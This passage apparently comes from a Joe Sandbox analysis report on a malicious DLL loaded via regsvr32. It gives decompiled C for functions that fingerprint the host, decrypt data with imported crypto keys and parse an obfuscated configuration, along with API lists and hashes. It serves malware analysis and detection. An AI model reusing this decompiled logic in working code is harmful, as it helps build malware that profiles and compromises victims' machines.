Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Free$HeapString
String ID: Uqt
API String ID: 3806048269-2320327147
Opcode ID: 794cb29826ea1a751e06069965b5e374cc4164f315061cfc8053ad02a52b64ec
Instruction ID: 675675b7db7f3bbf51a6086f820bc8fe58ae6b526ca75bca985ec1e747b53b97
Opcode Fuzzy Hash: 794cb29826ea1a751e06069965b5e374cc4164f315061cfc8053ad02a52b64ec
Instruction Fuzzy Hash: 6F012C32500659BBCF62AF95CC40FEA7B69EF44750F448058FF049A220DB36D960DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF5B4A Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(02AF1629), ref: 02AF5B63

Part of subcall function 02AF4BD5: SysFreeString.OLEAUT32(?), ref: 02AF4CB4

SysFreeString.OLEAUT32(00000000), ref: 02AF5BA4

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0ba3ce532d76820b7e422cd849624c542959e411623b8052399d2e783c62fe75
Instruction ID: ce7202827d6ae1bc68b4e0a278ff9b56c5d01b3b378ca0e670ae4b3c30aad9ce
Opcode Fuzzy Hash: 0ba3ce532d76820b7e422cd849624c542959e411623b8052399d2e783c62fe75
Instruction Fuzzy Hash: D001677590010ABFDB819FE8D908D9F7BB9EF48710B010461FB05E7120EB34D925CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3DE0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02AF3DE0(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02AF7A71(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02AF789E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02af3de5
0x02af3df0
0x02af3df2
0x02af3df8
0x02af3dfa
0x02af3dff
0x02af3e08
0x02af3e0c
0x02af3e15
0x02af3e19
0x02af3e28
0x02af3e1b
0x02af3e1c
0x02af3e21
0x02af3e21
0x02af3e19
0x02af3e0c
0x02af3e31

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,02AF3730,00000000,00000000,?,775EC740,02AF3730), ref: 02AF3DF8

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

GetComputerNameExA.KERNEL32(00000003,00000000,02AF3730,02AF3731,?,775EC740,02AF3730), ref: 02AF3E15

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 2cbfd914623be8d1d007807351cd8226cd0f03b7aada27afb2a63bd23b13af38
Instruction ID: b2ce7cc0c1d484204e8137329ecb5d1632faa0db3deb60182730e226b01d8861
Opcode Fuzzy Hash: 2cbfd914623be8d1d007807351cd8226cd0f03b7aada27afb2a63bd23b13af38
Instruction Fuzzy Hash: CBF03026A40145BAEB51D6E9DD40FAF76FDDFC5650F214099BA00D7140EE74DE018A70

Uniqueness

Uniqueness Score: -1.00%

Function 02AF72C0 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF72C0(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2afa2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x2afa1c8 = GetTickCount();
				_t5 = E02AF2D54(_a4);
				if(_t5 == 0) {
					_t5 = E02AF2CEC(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E02AF534A(_t9) != 0) {
							 *0x2afa300 = 1; // executed
						}
						_t7 = E02AF10AD(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x02af72c0
0x02af72c9
0x02af72cf
0x02af72d6
0x02af72da
0x00000000
0x02af72da
0x02af72e7
0x02af72ec
0x02af72f3
0x02af72f9
0x02af7300
0x02af7309
0x02af730b
0x02af730b
0x02af7315
0x00000000
0x02af7315
0x02af7300
0x02af731a

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,02AF3930,?), ref: 02AF72C9
GetTickCount.KERNEL32 ref: 02AF72DD

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 84b80e5349818049519f45e102e9eeddffdbf38074f8b61e720a5d6f9758e05b
Instruction ID: 49fdf18643bcb349707de3d1378bcc801f23bf1f844be532e5b0ab9043272b36
Opcode Fuzzy Hash: 84b80e5349818049519f45e102e9eeddffdbf38074f8b61e720a5d6f9758e05b
Instruction Fuzzy Hash: 15F06D30EC4302BAEBE02FF09E45B0AB6956B00705F204D62FF44D1192EFBCD0519A25

Uniqueness

Uniqueness Score: -1.00%

Function 02AF5D05 Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF5D05(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x2afa368; // 0x4f89668
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E02AF7571( &_v68) == 0) {
						goto L16;
					}
					_t30 = E02AF2C73(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E02AF4F4B(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E02AFA000 = E02AFA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E02AF70E7( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x2afa30c, 0) == 0x102);
				return _t30;
			}

0x02af5d05
0x02af5d0b
0x02af5d12
0x02af5d1a
0x02af5d20
0x02af5d23
0x02af5d25
0x02af5d25
0x02af5d2d
0x02af5d2d
0x02af5d37
0x00000000
0x00000000
0x02af5d46
0x02af5d4a
0x02af5d4e
0x02af5d53
0x02af5d57
0x02af5d93
0x02af5d95
0x02af5d95
0x02af5d59
0x02af5d60
0x02af5d8a
0x02af5d62
0x02af5d62
0x02af5d67
0x02af5d83
0x02af5d69
0x02af5d69
0x02af5d6e
0x02af5d73
0x02af5d76
0x02af5d78
0x02af5d7d
0x02af5d7f
0x02af5d7f
0x02af5d7d
0x02af5d6e
0x02af5d67
0x02af5d60
0x02af5d57
0x02af5da2
0x02af5da7
0x02af5da7
0x02af5dcb

APIs

WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02AF5DB7

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 6f62ac3a20cca8f598e00e1ed83697a2566110eb44aa22ed042737c6f11458a5
Instruction ID: b1498648e5f7180b9046b4d2497b5fb6413dfc241e7023a84c9e132b655994a0
Opcode Fuzzy Hash: 6f62ac3a20cca8f598e00e1ed83697a2566110eb44aa22ed042737c6f11458a5
Instruction Fuzzy Hash: 84216F32F023069BDB92DFD4D888BAE77B6AB84354F544425F70697280EF78D8528B90

Uniqueness

Uniqueness Score: -1.00%

Function 02AF5BB5 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02AF5BB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2afa348; // 0x248d5a8
				_t4 = _t15 + 0x2afb3a0; // 0x4f88948
				_t20 = _t4;
				_t6 = _t15 + 0x2afb124; // 0x650047
				_t17 = E02AF4BD5(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02AF1D63(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02af5bbf
0x02af5bc6
0x02af5bc7
0x02af5bc8
0x02af5bc9
0x02af5bcf
0x02af5bd4
0x02af5bd4
0x02af5bde
0x02af5bf0
0x02af5bf7
0x02af5c25
0x02af5bf9
0x02af5bfb
0x02af5c00
0x02af5c22
0x02af5c02
0x02af5c05
0x02af5c0c
0x02af5c11
0x02af5c13
0x02af5c13
0x02af5c18
0x02af5c18
0x02af5c00
0x02af5c2c

APIs

Part of subcall function 02AF4BD5: SysFreeString.OLEAUT32(?), ref: 02AF4CB4

Part of subcall function 02AF1D63: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02AF6189,004F0053,00000000,?), ref: 02AF1D6C
Part of subcall function 02AF1D63: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02AF6189,004F0053,00000000,?), ref: 02AF1D96
Part of subcall function 02AF1D63: memset.NTDLL ref: 02AF1DAA

SysFreeString.OLEAUT32(00000000), ref: 02AF5C18

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: cebfcf65fbbca705588a1c5f1e938e5bde77460f91e6d4fd83350871123f1484
Instruction ID: 208013accf2d3c1e886048c349626a5375612c7321f47f0c0a0cd271a5236633
Opcode Fuzzy Hash: cebfcf65fbbca705588a1c5f1e938e5bde77460f91e6d4fd83350871123f1484
Instruction Fuzzy Hash: 18017531940119BFDB91AFE5CD44EABBBB9FB08354F410965FB06E7060DB749922CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02AF44D8 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02AF44D8(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E02AF47E5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E02AF7A71(_a8 + _a8);
					if(_t21 != 0) {
						E02AF4456(_a4, _t21, _t23);
					}
					E02AF789E(_a4);
				}
				return _t21;
			}

0x02af44e0
0x02af44e7
0x02af44e9
0x02af44f8
0x02af44ff
0x02af450e
0x02af4512
0x02af4519
0x02af4519
0x02af4521
0x02af4526
0x02af452b

APIs

lstrlen.KERNEL32(00000000,00000000,02AF3831,00000000,?,02AF22E5,00000000,02AF3831,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF44E9

Part of subcall function 02AF47E5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02AF44FD,00000001,02AF3831,00000000), ref: 02AF481D
Part of subcall function 02AF47E5: memcpy.NTDLL(02AF44FD,02AF3831,00000010,?,?,?,02AF44FD,00000001,02AF3831,00000000,?,02AF22E5,00000000,02AF3831,?,775EC740), ref: 02AF4836
Part of subcall function 02AF47E5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02AF485F
Part of subcall function 02AF47E5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02AF4877
Part of subcall function 02AF47E5: memcpy.NTDLL(00000000,775EC740,04F89600,00000010), ref: 02AF48C9

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 7c4b4dbc2585c10f4f80f87e463b44426a537767fcc1b0a37cb5c52817b7694c
Instruction ID: c1deccbe52059a9fde01da3d14995d3b8db72cbfcf1e0f7dd54ac8c0e38a0501
Opcode Fuzzy Hash: 7c4b4dbc2585c10f4f80f87e463b44426a537767fcc1b0a37cb5c52817b7694c
Instruction Fuzzy Hash: 50F03A36140108BBCF52AF95DD40DEB7BAEEF893A0F008022FF18CA110DE35DA559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF187F Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF187F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E02AF53C8(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E02AF5B4A(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x02af1887
0x02af18a1
0x00000000
0x02af18bd
0x02af1898
0x02af189f
0x00000000
0x00000000
0x02af18c4

APIs

lstrlenW.KERNEL32(?,?,?,02AF24FA,3D02AF90,80000002,02AF68B1,02AF1629,74666F53,4D4C4B48,02AF1629,?,3D02AF90,80000002,02AF68B1,?), ref: 02AF18A4

Part of subcall function 02AF5B4A: SysAllocString.OLEAUT32(02AF1629), ref: 02AF5B63
Part of subcall function 02AF5B4A: SysFreeString.OLEAUT32(00000000), ref: 02AF5BA4

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: bd42528425d08e35c705633b187c3cd8c285ea33edd70cec902014449f835319
Instruction ID: ba48f48650d87f911d97862c10accfc28748566332f37bb7ae13fc29a2276689
Opcode Fuzzy Hash: bd42528425d08e35c705633b187c3cd8c285ea33edd70cec902014449f835319
Instruction Fuzzy Hash: D2F0923204020EFFDF525F90DD45EDA3FAAAB18354F448025FB1454061DB76C9B1EBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AF2792 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02AF2792(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x2afa344; // 0x69b25f44
				if(E02AF1696( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x2afa374 = _v8;
				}
				_t33 =  *0x2afa344; // 0x69b25f44
				if(E02AF1696( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2afa344; // 0x69b25f44
				_push(_t115);
				if(E02AF1696( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2afa2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2afa344; // 0x69b25f44
						_t45 = E02AF2A59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2afa2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2afa344; // 0x69b25f44
						_t46 = E02AF2A59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2afa2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2afa344; // 0x69b25f44
						_t47 = E02AF2A59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2afa2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2afa344; // 0x69b25f44
						_t48 = E02AF2A59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2afa004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2afa344; // 0x69b25f44
						_t49 = E02AF2A59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2afa02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2afa344; // 0x69b25f44
						_t50 = E02AF2A59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2afa2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2afa344; // 0x69b25f44
								_t51 = E02AF2A59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02AF18F5(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02AF731D();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2afa344; // 0x69b25f44
								_t52 = E02AF2A59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02AF18F5(0, _t52) != 0) {
								_t121 =  *0x2afa3cc; // 0x4f89600
								E02AF3D80(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2afa344; // 0x69b25f44
								_t53 = E02AF2A59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2afa348; // 0x248d5a8
								_t22 = _t54 + 0x2afb252; // 0x616d692f
								 *0x2afa370 = _t22;
								goto L60;
							} else {
								_t64 = E02AF18F5(0, _t53);
								 *0x2afa370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2afa344; // 0x69b25f44
										_t56 = E02AF2A59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x2afa348; // 0x248d5a8
										_t23 = _t57 + 0x2afb79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02AF18F5(0, _t56);
									}
									 *0x2afa3e0 = _t58;
									HeapFree( *0x2afa2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x02af2792
0x02af2792
0x02af2792
0x02af2792
0x02af2795
0x02af27b2
0x02af27c0
0x02af27c0
0x02af27c5
0x02af27df
0x02af2a4d
0x02af2a54
0x02af2a58
0x02af2a58
0x02af27e5
0x02af27ea
0x02af2802
0x02af2a3a
0x02af2a44
0x00000000
0x02af2808
0x02af2808
0x02af2809
0x02af280e
0x02af2824
0x02af2810
0x02af2810
0x02af281d
0x02af281d
0x02af2826
0x02af282f
0x02af2831
0x02af283b
0x02af2840
0x02af2840
0x02af283b
0x02af2847
0x02af285d
0x02af2849
0x02af2849
0x02af2856
0x02af2856
0x02af2861
0x02af2863
0x02af286d
0x02af2872
0x02af2872
0x02af286d
0x02af2879
0x02af288f
0x02af287b
0x02af287b
0x02af2888
0x02af2888
0x02af2893
0x02af2895
0x02af289f
0x02af28a4
0x02af28a4
0x02af289f
0x02af28ab
0x02af28c1
0x02af28ad
0x02af28ad
0x02af28ba
0x02af28ba
0x02af28c5
0x02af28c7
0x02af28d1
0x02af28d6
0x02af28d6
0x02af28d1
0x02af28dd
0x02af28f3
0x02af28df
0x02af28df
0x02af28ec
0x02af28ec
0x02af28f7
0x02af28f9
0x02af2903
0x02af2908
0x02af2908
0x02af2903
0x02af290f
0x02af2925
0x02af2911
0x02af2911
0x02af291e
0x02af291e
0x02af2929
0x02af293c
0x02af293c
0x00000000
0x02af292b
0x02af292b
0x02af2935
0x00000000
0x02af2946
0x02af2946
0x02af2948
0x02af295e
0x02af294a
0x02af294a
0x02af2957
0x02af2957
0x02af2962
0x02af2964
0x02af2967
0x02af2968
0x02af296f
0x02af2971
0x02af2972
0x02af2972
0x02af296f
0x02af2979
0x02af298f
0x02af297b
0x02af297b
0x02af2988
0x02af2988
0x02af2993
0x02af29a1
0x02af29ab
0x02af29ab
0x02af29b3
0x02af29c9
0x02af29b5
0x02af29b5
0x02af29c2
0x02af29c2
0x02af29cd
0x02af29e0
0x02af29e0
0x02af29e5
0x02af29eb
0x00000000
0x02af29cf
0x02af29d2
0x02af29d7
0x02af29de
0x02af29f0
0x02af29f2
0x02af2a08
0x02af29f4
0x02af29f4
0x02af2a01
0x02af2a01
0x02af2a0c
0x02af2a18
0x02af2a1d
0x02af2a1d
0x02af2a0e
0x02af2a11
0x02af2a11
0x02af2a2b
0x02af2a30
0x02af2a36
0x00000000
0x02af2a39
0x00000000
0x02af29de
0x02af29cd
0x02af2935
0x02af2929

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02AFA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02AF2837
StrToIntExA.SHLWAPI(00000000,00000000,?,02AFA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02AF2869
StrToIntExA.SHLWAPI(00000000,00000000,?,02AFA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02AF289B
StrToIntExA.SHLWAPI(00000000,00000000,?,02AFA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02AF28CD
StrToIntExA.SHLWAPI(00000000,00000000,?,02AFA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02AF28FF
StrToIntExA.SHLWAPI(00000000,00000000,?,02AFA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02AF2931
HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 02AF2A30
HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 02AF2A44

Strings

Uqt, xrefs: 02AF2A30, 02AF2A44

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
